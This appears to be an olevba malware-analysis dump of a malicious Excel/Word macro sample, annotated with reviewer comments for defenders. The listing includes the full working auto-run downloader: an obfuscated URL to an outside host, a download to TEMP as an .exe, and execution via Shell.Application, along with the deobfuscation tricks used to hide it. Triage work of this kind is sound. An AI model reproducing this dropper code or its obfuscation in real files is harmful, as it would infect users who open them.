- olevba 0.41 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB-V virus.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: virus.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ЭтаКнига.cls
- in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Auto-run entry point: olevba lists Workbook_Open as AutoExec ("Runs when the Excel Workbook is opened").
- ' It does nothing itself except hand off to GetFolderStartAndUp, which starts the download-and-open chain.
- ' NOTE(review): the sample is named virus.doc but the module (ЭтаКнига) and the _VBA_PROJECT_CUR storage look like an Excel workbook - confirm the real file type.
- Sub Workbook_Open()
- GetFolderStartAndUp (987)
- End Sub
- ' Stub called from Workbook_Open. The subMain argument (987 at the call site) is never read.
- Sub GetFolderStartAndUp(subMain As Long)
- ' SplitXMLStringAndNot returns without calling CreateObject when this flag is True, so it is forced to False first.
- blnSessionBegunRunRun = False
- ' IndentStringToVob performs the download, the write to disk and the launch.
- IndentStringToVob
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Лист1.cls
- in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Лист2.cls
- in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Лист3.cls
- in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function GetKeyValue(FullKeyName)
- xTotalStartUp = 0
- Dim Key1, Key2, i, Ua
- Ua = 10
- For i = 1 To Len(FullKeyName)
- If Mid(FullKeyName, i, 1) = "\" Then
- Ua = Ua + 10
- If Ua = 20 Then
- Key1 = Left(FullKeyName, i - 1)
- Key2 = Right(FullKeyName, Len(FullKeyName) - i)
- End If
- End If
- Next i
- 'frmMain.Cls
- If Key1 = "HKEY_LOCAL_MACHINE" Then
- RetVal = C.RegOpenKeyEx(HKEY_LOCAL_MACHINE, Key2, 0, KEY_ALL_ACCESS, hKey)
- ElseIf Key1 = "HKEY_CURRENT_USER" Then
- RetVal = RegOpe.nKeyEx(HKEY_CURRENT_USER, Key2, 0, KEY_ALL_ACCESS, hKey)
- End If
- Index = 0
- Do While RetVal = 0
- NameKey = Space(255)
- DataString = Space(255)
- LenName = 255
- DataLen = 255
- RetVal = RegEnu.mValue(hKey, Index, NameKey, LenName, 0, lpType, Da.ta(0), DataLen)
- If RetVal = 0 Then
- NameKey = Left(NameKey, LenName) 'Rut b? kho?n tr?ng th?a
- DataString = ""
- ' X? ly thong tin theo ki?u c?a no va ??a vao bi?n DataString
- Select Case lpType
- Case REG_SZ
- For i = 0 To DataLen - 1
- DataString = DataString & Chr(Da.ta(i)) ' N?i cac ch? cai thanh chu?i
- Next
- Case REG_BINARY
- For i = 0 To DataLen - 1
- Dim temp As String
- temp = Hex(Da.ta(i))
- If Len(temp) < 2 Then temp = String(2 - Len(temp), "0") & temp
- DataString = DataString & temp & " "
- ' N?i cac c?p s? nh? phan l?i v?i nhau
- Next
- Case REG_DWORD
- For i = DataLen - 1 To 0 Step -1
- DataString = DataString & Hex(Da.ta(i)) 'N?i cac so hexa v?i nhau
- Next
- Case REG_MULTI_SZ
- For i = 0 To DataLen - 1
- DataString = DataString & Chr(Da.ta(i))
- 'N?i cac ky t? bao g?m ky t? vbNullChar (?? cach dong) thanh m?t chu?i, b?n co th? s? d?ng m?t m?ng g?m nhi?u string thay vi la m?t
- Next
- Case REG_EXPAND_SZ
- For i = 0 To DataLen - 2
- DataString = DataString & Chr(Da.ta(i))
- 'N?i cac ky t? l?i v?i nhau, b? ky t? NULL cu?i cung
- Next
- Case Else
- DataString = " Khong xac dinh duoc !"
- ' Tren ?ay la 5 ki?u co tren WinXP
- End Select
- End If
- Loop
- End Function
- ' Writes a byte buffer to a file through a stream COM object.
- '   VariantNeVariant - the data to write (IndentStringToVob passes the HTTP response body).
- '   StringAsString   - destination path (IndentStringToVob passes the value from GetTasNewUt).
- ' No return value is assigned.
- Public Function ntegerLongue(VariantNeVariant As Variant, StringAsString As String)
- Dim rimmaLongInteger As Object
- ' The Chr()/literal mix evaluates to "Ad(odb*.)Strea+m" (see the olevba "VBA string" table);
- ' SplitXMLStringAndNot removes ( ) * + before CreateObject, leaving the ProgID "Adodb.Stream".
- Set rimmaLongInteger = SplitXMLStringAndNot(Chr(65) & Chr(100) + "(" & Chr(111) & Chr(100) & "b*" & Chr(46) & ")S" & Chr(116) & Chr(114) & Chr(101) & Chr(97) & "+m")
- ' Type = 1 selects binary mode on an ADODB.Stream, so the bytes are written unmodified.
- rimmaLongInteger.Type = 1
- With rimmaLongInteger
- .Open
- .write VariantNeVariant
- End With
- ' REGMULTISZ1 calls savetofile on the stream with the destination path.
- REGMULTISZ1 rimmaLongInteger, StringAsString
- End Function
- ' Filler: no call to this function appears anywhere in the listing.
- ' The body uses NameKey, LenName, DataString, Key1, Key2, Index and hKey, which are only assigned inside
- ' GetKeyValue, so it reads like the tail of that function's enumeration loop moved into a separate procedure.
- ' NOTE(review): "RegC.loseKey" has a dot inside what looks like the RegCloseKey API name, so it is a member
- ' access on an undefined object rather than an API call - presumably padding that is never meant to run; confirm.
- Public Function ntegerccCLongue()
- If Left(Left(NameKey, LenName), 1) <> " " Then
- '///////////////////
- 'Form1.List1.AddItem DataString
- With frmMain.LV
- Dim iu
- iu = .ListItems.Count + 1
- .ListItems.Add iu, , Left(NameKey, LenName)
- .ListItems(iu).SubItems(1).Caption = DataString
- .ListItems(iu).SubItems(2).Caption = Key1 & "\" & Key2 & "\" & Left(NameKey, LenName)
- End With
- '///////////////
- End If
- Index = Index + 1
- 'frmMain.Print Left(NameKey, LenName) & "=" & DataString
- RetVal = RegC.loseKey(hKey)
- End Function
- ' Returns the part of sPath after the last backslash (the whole string when there is no backslash).
- ' No call to it appears in this listing; it is not part of the Workbook_Open chain.
- Public Function GetFileName(ByVal sPath As String) As String
- GetFileName = Mid(sPath, InStrRev(sPath, "\") + 1)
- End Function
- ' Core of the macro: fetches a remote file over HTTP, writes it under the TEMP directory and opens it.
- ' Reached from Workbook_Open via GetFolderStartAndUp. Takes no arguments; the destination path is kept
- ' in the module-level variable ListItemsAndNot so that IniStringPrivateLong can read it later.
- ' For defenders, the observable steps are: the Office process creating Microsoft.XMLHTTP / Adodb.Stream /
- ' Shell.Application objects, an outbound HTTP GET, an .ExE file written under TEMP, and that file being opened.
- Public Sub IndentStringToVob()
- Dim SplitIndexAsString As Object
- ' Evaluates to "M++i(cr)osoft.*XML*HTTP"; SplitXMLStringAndNot strips ( ) * + and creates "Microsoft.XMLHTTP".
- Set SplitIndexAsString = SplitXMLStringAndNot(Chr(77) & "++" + Chr(105) & "(cr)" & Chr(111) & Chr(130 - 15) & Chr(100 + 11) & Chr(102) & "t" & Chr(46) & "*X" & Chr(77) & Chr(76) & "*H" & Chr(84) & "TP")
- Dim SIDRa As String
- ' CHR20 is assigned but never read in this procedure.
- Dim CHR20 As Integer
- CHR20 = 20
- ' Character-by-character build of the download URL; olevba decodes it in the IOC rows of its summary table.
- SIDRa = Chr(104) & "t" & "t" & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(97) & "l" & Chr(97) & Chr(114) & Chr(109) & Chr(116) & Chr(101) & Chr(99) & "h" & Chr(99) & Chr(101) & Chr(110) & "t" & "r" & "a" & Chr(108) & "." & Chr(99) & Chr(111) & Chr(109) & "/" & "f" & "w" & Chr(52) & "3" & "t" & "2" & Chr(100) & "/" & Chr(57) & "8" & Chr(107) & "j" & "6" & Chr(46) & Chr(101) & Chr(120) & "e"
- ' Removes Chr(40)..Chr(43), i.e. ( ) * +, from the URL; the decoded URL contains none of them, so this changes nothing here.
- For i = 1 To 4
- SIDRa = Replace(SIDRa, Chr(20 * 2 + i - 1), "")
- Next i
- ' HIDRAfob calls .Open "GET", <url>, False on the HTTP object (synchronous request).
- HIDRAfob SplitIndexAsString, SIDRa
- Dim LocaliseStringItem3() As Byte
- ' Destination path from GetTasNewUt: the process TEMP value followed by "\kah78d.ExE".
- ListItemsAndNot = GetTasNewUt()
- ' RSPBDY sends the request and returns responseBody; the HTTP status is not checked anywhere.
- LocaliseStringItem3 = RSPBDY(SplitIndexAsString)
- ' ntegerLongue writes the response bytes to ListItemsAndNot through an Adodb.Stream.
- ntegerLongue LocaliseStringItem3, ListItemsAndNot
- ' The division by zero is deliberate: it raises a run-time error so control jumps to the handler label,
- ' which is where the dropped file is opened. The launch is therefore reached through error handling
- ' rather than through a direct call on the main path.
- On Error GoTo LocaliseStringItem5
- A = 889 / 0
- On Error GoTo 0
- IniStringPrivateInteger:
- Exit Sub
- LocaliseStringItem5:
- ' IniStringPrivateLong ignores its argument and opens ListItemsAndNot via Shell.Application.
- IniStringPrivateLong ("VisokAndVisok")
- Resume IniStringPrivateInteger
- End Sub
- ' Returns the part of sPath before the last backslash.
- ' When sPath has no backslash, InStrRev returns 0 and Left is called with -1, which raises a run-time error.
- ' No call to it appears in this listing; it is not part of the Workbook_Open chain.
- Public Function GetFolderPath(ByVal sPath As String) As String
- GetFolderPath = Left(sPath, InStrRev(sPath, "\") - 1)
- End Function
- ' Filler: no call to this procedure appears in the listing, and frmMain is not defined in any listed module.
- ' As written it would list the Winlogon Shell and Userinit values in a list view; it only reads, it sets nothing.
- ' NOTE(review): "ToUnik.Code", "GetS.tring" and "GetSt.ring" carry a dot inside what look like helper names,
- ' which turns them into member accesses on undefined objects - presumably padding; confirm.
- ' The Winlogon strings still matter for triage because they can trip registry-persistence keyword rules
- ' even though nothing on the Workbook_Open path touches the registry.
- Public Sub GetSystemKey()
- With frmMain.LV
- Dim iu
- iu = .ListItems.Count + 1
- .ListItems.Add iu, , ToUnik.Code("Shell [He65 Tho61ng]")
- .ListItems(iu).SubItems(1).Caption = GetS.tring(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
- .ListItems(iu).SubItems(2).Caption = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
- iu = .ListItems.Count + 1
- .ListItems(iu).SubItems(1).Caption = GetSt.ring(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit")
- .ListItems(iu).SubItems(2).Caption = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
- End With
- End Sub
- Public Sub GetFolderStartUp(sWhere)
- With frmMain
- Dim j
- Dim o
- If sWhere = 1 Then
- .File1.Path = "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
- For j = 0 To .File1.ListCount - 1
- o = .LV.ListItems.Count + 1
- .LV.ListItems.Add o, , .File1.List(j)
- .LV.ListItems(o).SubItems(1).Caption = "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\" & .File1.List(j)
- .LV.ListItems(o).SubItems(2).Caption = "---"
- Next j
- Else
- .File1.Path = "C:\Documents and Settings\" & Environ$("USERNAME") & "\Start Menu\Programs\Startup"
- For j = 0 To .File1.ListCount - 1
- o = .LV.ListItems.Count + 1
- .LV.ListItems.Add o, , .File1.List(j)
- .LV.ListItems(o).SubItems(1).Caption = "C:\Documents and Settings\" & Environ$("USERNAME") & "\Start Menu\Programs\Startup\" & .File1.List(j)
- .LV.ListItems(o).SubItems(2).Caption = "---"
- Next j
- End If
- End With
- End Sub
- ' Prepares the HTTP request on the object created in IndentStringToVob (ProgID "Microsoft.XMLHTTP").
- '   SplitIndexAsString - the HTTP request object.
- '   SIDRa              - the URL to request.
- ' Chr(71) & Chr(69) & "T" is "GET"; the third argument False makes the request synchronous.
- ' Replace(SIDRa, "??", "//") is a no-op for the URL built in IndentStringToVob, which already contains "//".
- ' The request is only opened here; RSPBDY sends it.
- Public Function HIDRAfob(SplitIndexAsString As Object, SIDRa As String)
- SplitIndexAsString.Open Chr(71) & Chr(69) & "T", Replace(SIDRa, "??", "//"), False
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Module-level state. Everything except blnSessionBegunRunRun belongs to the QuickBooks (qbXMLRP)
- ' connection code in this module, which nothing on the Workbook_Open path calls.
- Public blnIsOpenConnection As Boolean
- Public blnSessionBegun As Boolean
- ' Ticket
- Public ticket As String
- ' Guard read by SplitXMLStringAndNot: when True it skips CreateObject. GetFolderStartAndUp sets it to False.
- Public blnSessionBegunRunRun As Boolean
- ' Request and response strings
- Public requestXML As String
- Public responseXML As String
- Public Function OpenConnection() As Boolean
- 'Open the connection
- On Error GoTo ErrHandler
- If blnIsOpenConnection Then
- OpenConnection = True
- Exit Function
- End If
- blnSessionBegun = False
- blnIsOpenConnection = False
- ' Open connection to qbXMLRP COM
- qbXMLRP.OpenConnection "QBRAddEmp", "IDN QuickBooks Sample Add Invoice"
- blnIsOpenConnection = True
- ' Begin Session
- ' Pass empty string for the data file name to use the currently
- ' open data file.
- ticket = qbXMLRP.BeginSession("", QBXMLRPLib.qbFileOpenSingleUser)
- blnSessionBegun = True
- OpenConnection = True 'return that the connection was successful
- 'Verifying which version of qbXML QuickBooks is supporting If you want to do a US/Canadian APP,
- 'This is where you would find the version supported by QuickBooks. You would modify the requests accordingly
- 'to the version of QuickBooks
- Dim VersionSupportedArray() As String
- VersionSupportedArray = qbXMLRP.QBXMLVersionsForSession(ticket) ' This return an array of string containing all the version of qbXML
- 'supported by QuickBooks
- 'Checking that QuickBooks support the Canadian SDK (version CA2.0)
- Dim strCanadianVersion As String
- Dim blnCanadianVersionFound As Boolean
- Dim str As Variant
- ' Dim nArrayUpperBound As Integer
- strCanadianVersion = "CA2.0"
- blnCanadianVersionFound = False
- For Each str In VersionSupportedArray
- If strCanadianVersion = str Then
- blnCanadianVersionFound = True
- End If
- Next str
- If blnCanadianVersionFound = False Then 'If version CA 2.0 not found...
- MsgBox "This QuickBooks does not support the version CA2.0 of qbXML", , "qbXML version not supported"""
- If blnSessionBegun = True Then
- qbXMLRP.EndSession ticket
- End If
- ' Close the connection
- If blnIsOpenConnection = True Then
- blnIsOpenConnection = False
- qbXMLRP.CloseConnection
- End If
- OpenConnection = False
- End If
- Exit Function
- ErrHandler:
- blnIsOpenConnection = False
- OpenConnection = False
- ' End the session
- If blnSessionBegun = True Then
- qbXMLRP.EndSession ticket
- End If
- ' Close the connection
- If blnIsOpenConnection = True Then
- qbXMLRP.CloseConnection
- End If
- MsgBox Err.Description, vbExclamation, "Error"
- Exit Function
- End Function
- Public Sub CloseConnection()
- ' Ends session and closes connection
- If Not blnIsOpenConnection Then
- Exit Sub
- End If
- On Error GoTo ErrHandler
- If blnSessionBegun = True Then
- qbXMLRP.EndSession ticket
- End If
- ' Close the connection
- If blnIsOpenConnection = True Then
- qbXMLRP.CloseConnection
- End If
- Exit Sub
- ErrHandler:
- MsgBox Err.Description, vbExclamation, "Error"
- Exit Sub
- End Sub
- ' Opens the file whose path is stored in the module-level variable ListItemsAndNot.
- ' The parameter ZRzNfTJSyBWpPu is never read; IndentStringToVob passes the throwaway string "VisokAndVisok".
- ' Called only from the error handler in IndentStringToVob, after the payload has been written to disk.
- Public Function IniStringPrivateLong(ZRzNfTJSyBWpPu As String)
- ' Evaluates to "She(l)+l+.A*pp(l)ica+ti()on"; SplitXMLStringAndNot strips ( ) * + and creates "Shell.Application".
- Set IniLongPrivateInteger = SplitXMLStringAndNot("Sh" & Chr(101) & "(l)" & "+l+" & Chr(46) & Chr(65) & "*p" & Chr(112) & "(l)" & Chr(105) & Chr(99) & "a+t" + Chr(105) & "()" & Chr(111) + Chr(110))
- ' Shell.Application.Open on the dropped path; since the path ends in .ExE this presumably runs the file.
- IniLongPrivateInteger.Open (ListItemsAndNot)
- End Function
- ' This subroutine is available for error checking. It is sometimes
- ' useful to print the XML which QuickBooks returns to a file so that
- ' any problems can be uncovered easily. Although this subroutine is
- ' not currently in use in the ReceievePayment sample code, it is
- ' encouraged that you add it in if you would like to see the precise
- ' XML that is being sent to or received from QuickBooks.
- '
- Sub PrintXMLToFile(xmlString As String, XMLFile As String)
- Dim SplitXMLString() As String
- Dim IndentString As String
- Dim xmlStringLength As Long
- Dim SplitIndex
- IndentString = ""
- Dim FileNum
- FileNum = FreeFile
- Open XMLFile For Output As FileNum
- ' Remove the linefeeds from the XML output string
- xmlString = Replace(xmlString, vbLf, vbNullString)
- SplitXMLString = Split(xmlString, "<")
- ' We're expecting the first character of the XML output to be "<"
- ' which result in an empty first array element, so skip it.
- SplitIndex = LBound(SplitXMLString) + 1
- End Sub
- ' Sends the request previously opened by HIDRAfob and returns the raw response body.
- '   SomeBody - the HTTP request object created in IndentStringToVob.
- ' Returns responseBody as a Variant; the caller assigns it to a Byte array.
- ' Neither the HTTP status nor the content is checked, so whatever the server returns is written to disk.
- Public Function RSPBDY(SomeBody As Object) As Variant
- SomeBody.Send
- RSPBDY = SomeBody.responseBody
- End Function
- Public Sub ReadFile( _
- strName As String, _
- strDate As String _
- )
- Dim strMstDir As String
- Dim strClientName As String
- Dim strTargetdate As String
- Dim intCntPic As Integer
- strMstDir = gstrMstDir
- strClientName = strName
- If strDate <> vbNullString Then
- strTargetdate = strDate
- End If
- '' Select Case frmSubForm.Name
- '' Case "frmBasic"
- intCntPic = 13
- '' Case "frmFP"
- '' intCntPic = 3
- '' Case "frmIOP"
- '' intCntPic = 6
- '' End Select
- Dim intIndex As Integer
- ReDim m_udtFileList(intIndex)
- Dim strDirFile As String, strLoadPicFile As String
- Dim intFileHandle As Integer
- Dim strFilePath As String
- Dim strFileName As String
- Dim strReadHeader As String
- Dim strReadData As String
- strFilePath = gstrMstDir & "\" & strName
- strFileName = strFilePath & "\" & strDate & "T.txt"
- If strName = vbNullString Then Exit Sub
- If Dir(strFileName) = vbNullString Then Exit Sub
- '/** ??????? **/
- datDate = CDate(DateSerial(Left$(strDate, 4), _
- Mid$(strDate, 5, 2), Mid$(strDate, 7, 2)))
- '// ??????????????
- m_sParts = vbNullString
- '/** ?????????????? **/
- intFileHandle = FreeFile()
- Open strFileName For Input As #intFileHandle
- ReDim Preserve m_udtFileList(intIndex)
- While Not EOF(intFileHandle)
- With m_udtFileList(intIndex)
- Input #intFileHandle, strReadHeader, strReadData
- Select Case strReadHeader
- Case "[Picture]"
- Case "[Document]"
- Case "[Shooting]"
- Case "NAME"
- m_sParts = strReadData
- Case Else
- If strReadData <> "" Then
- .intFileNum = CInt(Right$(strReadHeader, 1))
- .strClntName = strName
- .strFileDate = Left$(strReadData, 8)
- '' datDate = CDate(DateSerial(Left$(strReadData, 4), _
- Mid$(strReadData, 5, 2), Mid$(strReadData, 7, 2)))
- .strFileName = strReadData
- .strFileType = Left$(strReadHeader, 1)
- strLoadPicFile = gstrMstDir & "\" & .strClntName & "\" & .strFileName
- Call frmProgress.SetProgess((intIndex) / intCntPic * 100)
- intIndex = intIndex + 1
- End If
- End Select
- End With
- ReDim Preserve m_udtFileList(intIndex)
- Wend
- Close #intFileHandle
- DoEvents
- End Sub
- ' String de-obfuscator plus object factory used by every step of the chain.
- '   InitiPrivateInteger - a ProgID padded with the characters ( ) * +.
- ' Returns the object created by CreateObject for the cleaned ProgID, or nothing when blnSessionBegunRunRun is True.
- ' All four COM objects in this sample (Microsoft.XMLHTTP, Adodb.Stream, WScript.Shell, Shell.Application)
- ' are created here, so the ProgID literals never appear in clear text in the macro source.
- Public Function SplitXMLStringAndNot(InitiPrivateInteger As String)
- ' 20 * 2 + i - 1 for i = 1..4 gives character codes 40, 41, 42, 43: "(", ")", "*", "+".
- For i = 1 To 4
- InitiPrivateInteger = Replace(InitiPrivateInteger, Chr(20 * 2 + i - 1), "")
- Next i
- ' Guard flag; GetFolderStartAndUp sets it to False before the chain starts, so this branch is not taken on that path.
- If blnSessionBegunRunRun Then
- Exit Function
- End If
- Set SplitXMLStringAndNot = CreateObject(InitiPrivateInteger)
- End Function
- Public Function SmthingWrongFunc()
- Do
- If Left(Splift.xmlString(SplitIndex), 1) = "/" Then
- IndentString = Left(IndentString, Len(IndentString) - 3)
- Print #FileNum, IndentString & "<" & _
- SplitXM.LString(SplitIndex)
- SplitIndex = SplitIndex + 1
- ElseIf Left(SplitXM.LString(SplitIndex + 1), 1) = "/" Then
- If InStr(1, _
- Left(SplitXM.LString(SplitIndex), _
- InStr(1, SplitXM.LString(SplitIndex), ">")), _
- " ") > 0 Then
- Print #FileNum, IndentString & "<" & _
- SplitXM.LString(SplitIndex)
- SplitIndex = SplitIndex + 1
- Else
- Print #FileNum, IndentString & "<" & _
- SplitXM.LString(SplitIndex) & "<" & _
- SplitXM.LString(SplitIndex + 1)
- SplitIndex = SplitIndex + 2
- End If
- Else
- Print #FileNum, IndentString & "<" & _
- SplitXM.LString(SplitIndex)
- IndentString = IndentString & " "
- SplitIndex = SplitIndex + 1
- End If
- Loop Until SplitIndex >= UBound(SplitX.MLString)
- If Left(SplitXM.LString(UBound(SplitX.MLString)), 1) = "/" Then
- IndentString = Left(IndentString, Len(IndentString) - 3)
- End If
- Print #FileNum, IndentString & "<" & _
- SplitXM.LString(UBound(SplitXM.LString))
- Close FileNum
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Path of the dropped file: set from GetTasNewUt in IndentStringToVob, read by IniStringPrivateLong when it opens the file.
- Public ListItemsAndNot As String
- Public Function GetCharsetFromLng(lngCodePage As Long) As Long
- Dim lngCharset As Long
- Select Case lngCodePage
- Case 1251
- lngCharset = RUSSIAN_CHARSET
- Case 1250
- 'EASTEUROPE_CHARSET = 238
- lngCharset = EASTEUROPE_CHARSET
- Case 1252
- 'ANSI_CHARSET = 0
- lngCharset = ANSI_CHARSET
- Case 1253
- 'GREEK_CHARSET = 161
- lngCharset = GREEK_CHARSET
- Case 1254
- 'TURKISH_CHARSET = 162
- lngCharset = TURKISH_CHARSET
- Case 1255
- 'HEBREW_CHARSET = 177
- lngCharset = HEBREW_CHARSET
- Case 1256
- 'ARABIC_CHARSET = 178
- lngCharset = ARABIC_CHARSET
- Case 1257
- 'BALTIC_CHARSET = 186
- lngCharset = BALTIC_CHARSET
- Case 1258
- 'VIETNAMESE_CHARSET = 163
- lngCharset = VIETNAMESE_CHARSET
- Case 874
- lngCharset = THAI_CHARSET
- Case 932
- 'SHIFTJIS_CHARSET = 128
- lngCharset = SHIFTJIS_CHARSET
- Case 949
- 'HANGUL_CHARSET = 129
- lngCharset = HANGUL_CHARSET
- Case 936
- 'GB2312_CHARSET = 134
- lngCharset = GB2312_CHARSET
- Case 950
- 'CHINESEBIG5_CHARSET = 136
- lngCharset = CHINESEBIG5_CHARSET
- Case Else
- 'DEFAULT_CHARSET = 1
- lngCharset = DEFAULT_CHARSET
- End Select
- GetCharsetFromLng = lngCharset
- End Function
- ' Builds the path the downloaded file is written to and later opened from.
- ' Returns the process-level TEMP value followed by "\kah78d.ExE". olevba's table only shows the
- ' "TEMP\kah78d" fragment because the rest of the name comes from arithmetic Chr() calls.
- Public Function GetTasNewUt() As String
- ' Evaluates to "W(S+c)ri*pt.Shel))l"; SplitXMLStringAndNot strips ( ) * + and creates "WScript.Shell".
- Set LocaliseStringItem0 = SplitXMLStringAndNot(Chr(87) & "(S+c)" & Chr(114) & Chr(105) & "*p" & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & "))l")
- ' The Chr() sequence is "Process": the process-scope environment collection.
- Set LocaliseStringItem1 = LocaliseStringItem0.Environment(Chr(80) & "r" & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
- Dim huh2 As Integer
- huh2 = 25
- Dim uhu As String
- ' 16 * Sqr(25) - 10 - 1 = 69, so uhu = "E".
- uhu = Chr(16 * Sqr(huh2) - 10 - 1)
- ' 180 - 30 * 2 = 120 ("x"), prepended: uhu = "xE".
- uhu = Chr(180 - 30 * 2) + uhu
- ' Environment key is "TEMP"; Chr(40 + 2 * 3) = "." and Chr(70 - 1) = "E", giving "\kah78d" & "." & "E" & "xE".
- GetTasNewUt = LocaliseStringItem1(Chr(84) & "E" & Chr(77) & Chr(80)) + _
- "\ka" & Chr(104) + "78d" & Chr(40 + 2 * 3) & Chr(70 - 1) + uhu
- End Function
- '!--------------------------------------------------------------------------------
- '! Procedure (Ooieoey) : Function GetUserLocaleInfo
- '! Description (Iienaiea) : [type_description_here]
- '! Parameters (Ia?aiaiiua): dwLocaleID (Long)
- ' dwLCType (Long)
- '!--------------------------------------------------------------------------------
- Public Function GetUserLocaleInfo(ByVal dwLocaleID As Long, ByVal dwLCType As Long) As String
- Dim sReturn As String
- Dim R As Long
- 'call the function passing the Locale type
- 'variable to retrieve the required size of
- 'the string buffer needed
- R = ss.GetLocaleInfo(dwLocaleID, dwLCType, sReturn, 0)
- 'if successful..
- If R Then
- 'pad the buffer with spaces
- sReturn = s.FillNullChar(R)
- 'and call again passing the buffer
- R = cs.GetLocaleInfo(dwLocaleID, dwLCType, sReturn, Len(sReturn))
- 'if successful (r > 0)
- If R Then
- 'r holds the size of the string
- 'including the terminating null
- GetUserLocaleInfo = sc.TrimNull(sReturn)
- End If
- End If
- End Function
- '!--------------------------------------------------------------------------------
- '! Procedure (Ooieoey) : Function LoadLanguageList
- '! Description (Iienaiea) : [Caa?ocea nienea ycueia]
- '! Parameters (Ia?aiaiiua):
- '!--------------------------------------------------------------------------------
- Public Function LoadLanguageList() As Boolean
- Dim strFileList_x() As Integer
- Dim ii As Integer
- Dim jj As Integer
- Dim strTemp As String
- Dim strLangFilePath As String
- Dim lngUbound As Long
- strFileList_x = sc.SearchFilesInRoot(strAppPathBackSL & strToolsLang_Path, "*.lng", False, False)
- lngUbound = UBound(strFileList_x)
- If lngUbound Then
- If LenB(sc.strFileList_x(0).FullPath) Then
- ReDim arrLanguage(6, lngUbound + 1)
- For ii = 0 To lngUbound
- jj = ii + 1
- ' Ioou ai ycueiaiai oaeea
- strLangFilePath = cs.strFileList_x(ii).FullPath
- arrLanguage(1, jj) = strLangFilePath
- ' Eiy ycuea
- arrLanguage(2, jj) = GetIn.iValueString(strLangFilePath, "Lang", "Name", vbNullString)
- ' Eiy ia?aaia?eea
- arrLanguage(4, jj) = GetIn.iValueString(strLangFilePath, "Lang", "TranslatorName", vbNullString)
- ' Aa?an ia?aaia?eea
- arrLanguage(5, jj) = GetIn.iValueString(strLangFilePath, "Lang", "TranslatorURL", vbNullString)
- ' Charset ycuea
- arrLanguage(6, jj) = GetIn.iValueLong(strLangFilePath, "Lang", "Charset", 1)
- ' ID ycuea
- strTemp = GetIn.iValueString(strLangFilePath, "Lang", "ID", vbNullString)
- If LenB(strTemp) Then
- arrLanguage(3, jj) = strTemp
- If mbAutoLanguage Then
- If InStr(1, strTemp, strPCLangID, vbTextCompare) Then
- strPCLangCurrentPath = arrLanguage(1, jj)
- strPCLangCurrentLangName = arrLanguage(2, jj)
- lngFont_Charset = GetCharsetFromLng(CLng(arrLanguage(6, jj)))
- strPCLangCurrentID = strPCLangID
- End If
- Else
- If LenB(strStartLanguageID) Then
- If InStr(1, strTemp, strStartLanguageID, vbTextCompare) Then
- strPCLangCurrentPath = arrLanguage(1, jj)
- strPCLangCurrentLangName = arrLanguage(2, jj)
- lngFont_Charset = GetCharsetFromLng(CLng(arrLanguage(6, jj)))
- strPCLangCurrentID = strStartLanguageID
- End If
- End If
- End If
- End If
- LoadLanguageList = True
- Next
- If LenB(strPCLangCurrentPath) = 0 Then
- strPCLangCurrentPath = Pa.thCombine(strAppPathBackSL & strToolsLang_Path, "English.lng")
- strPCLangCurrentID = "0409"
- lngFont_Charset = 1
- End If
- End If
- End If
- End Function
- '!--------------------------------------------------------------------------------
- '! Procedure (Ooieoey) : Sub LoadLanguageOS
- '! Description (Iienaiea) : [N?eouaaai ycue iia?aoeiiiie nenoaiu, e caienuaaai a ia?aiaiiua Public]
- '! Parameters (Ia?aiaiiua):
- '!--------------------------------------------------------------------------------
- Public Sub LoadLanguageOS()
- Dim LCID As Long
- ' N?eouaaai ycue iia?aoeiiie nenoaiu
- LCID = GetSys.temDefaultLCID()
- 'language id
- strPCLangID = GetUserLocaleInfo(LCID, LOCALE_ILANGUAGE)
- 'localized name of language
